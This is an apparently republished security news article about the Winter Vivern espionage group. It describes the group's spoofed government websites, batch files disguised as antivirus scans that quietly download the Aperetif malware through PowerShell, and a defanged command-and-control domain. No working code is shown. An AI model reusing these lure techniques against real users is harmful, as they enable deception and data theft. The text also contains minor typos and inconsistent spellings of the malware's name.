Winter Vivern APT hackers use fake antivirus scans to install malware

An advanced hacking group called ‘Winter Vivern’ targets European government organizations and telecommunication service providers to conduct espionage.

The group’s activities align with the interests of the Russian and Belarusian governments, thus it is believed that this is a pro-Russian APT (Advanced Persistent Threat) group.

SentinelLabs reports that the threat group works with limited resources; however, his creativity makes up for these limitations.

Recent activity

Winter Vivern was first documented by DomainTools in 2021 when it was seen targeting government organizations in Lithuania, Slovakia, the Vatican, and India.

In more recent campaigns seen by Sentinel Labs, hackers target people who work in the governments of Poland, Italy, Ukraine and India.

In addition to high-profile state targets, hackers have also targeted telecommunications companies, such as those that have supported Ukraine since the Russian invasion.

In early 2023, hackers created webpages imitating those of the Polish Central Office for Combating Cyber-Crime, the Ukrainian Ministry of Foreign Affairs, and the Ukrainian Security Service.

Fake site imitating a Polish agency
Fake site imitating a Polish agency (Sentinel Laboratories)

These sites distribute malicious files to visitors who end up there by clicking links in the malicious emails.

SentinelLabs has previously seen spreadsheet (XLS) files with malicious macros that launch PowerShell being placed on cloned sites used by APT.

Implementation of fake virus scanners

An example of Winter Vivern’s ingenuity in the Sentinel Labs report is Windows’ use of batch files to impersonate antivirus scanners while actually downloading malicious payloads.

As you can see in the batch files below, the malicious files will simulate running an antivirus scan, displaying a percentage of execution time remaining, while silently downloading a malicious payload using PowerShell.

Scripts that simulate fake VT scans
Scripts that simulate fake VT scans (Sentinel Laboratories)

The payload delivered through this process is called “Aperetif”, which the Ukrainian CERT documented in detail in a February 2023 report.

The malware is hosted on compromised WordPress websites, which are commonly used for malware distribution campaigns.

Aperetif malware is capable of automatically scanning and exfiltrating files, taking screenshots, and sending all data in a base64-encoded format to an encoded command and control server URL (marakanas).[.]com).

SentinelLabs recently discovered a new payload used by Winter Vivern, which appears to be similar in functionality to Aperefit, but has an incomplete design, indicating that it is a work in progress.

In both cases, which overlap in their implementation, the malware beacons connect to C2 using PowerShell and wait for additional instructions or payloads.

In conclusion, Winter Vivern is a group that uses a relatively simple but effective approach to lure its targets into downloading malicious files. At the same time, their low profile has helped them avoid being reported.

Source link

James D. Brown
James D. Brown
Articles: 8676